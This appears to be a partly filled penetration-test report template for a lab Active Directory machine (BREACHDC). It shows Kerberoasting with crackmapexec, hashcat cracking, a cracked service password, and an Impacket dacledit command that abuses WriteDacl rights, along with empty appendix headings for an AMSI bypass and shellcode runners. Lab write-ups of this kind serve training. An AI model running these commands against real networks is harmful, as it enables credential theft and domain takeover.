Detailed Findings and Recommendations

The scope of this penetration test is to identify, exploit and report the results of of penetration test performed on following set of IP addresses.

IDIPsNameDC
Machine 110.10.124.219BREACHDC.BREACH.VL

Enumeration

8. Internal Recon Ntlm theft by uploading files on SMB share

julia.wong
Computer1
cme ldap ip.txt -u julia.wong -p Computer1 --kerberoasting KERBEROASTING
hashcat hashes_kerberoasting /usr/share/wordlists/rockyou.txt
svc_mssql
Trustno1

Modifying the rights

To abuse WriteDacl to a group object, you may grant yourself the AddMember privilege.

Impacket’s dacledit can be used for that purpose (cf. “grant rights” reference for the link).

dacledit.py -action 'write' -rights 'WriteMembers' -principal 'controlledUser' -target-dn 'groupDistinguidedName' 'domain'/'controlledUser':'password'

Additional Items

Appendix - AMSI Bypass code

Appendix - Powershell Shellcoderunner

Appendix - ANOTHER_SHELLCODE_USED Shellcoderunner Code

Appendix - Risk Assessment Matrix

Appendix - Proof and Local Contents

Hostnamelocal.txt Contentsproof.txt Contents
HOSTNAMEfoobar
HOSTNAMEfoobar

Appendix - Credentials obtained

NTLM Hashes

UsernameNTLM HashFound in
AdministratorHASHHOSTNAME

Passwords

Found inCorresponds toPassword
HOSTNAMEUSER BELONGSPassword123*

Credential’s files

Found inFileType
HOSTNAMEFILE FROM WHERE IS ITExample: SSH Priv. Key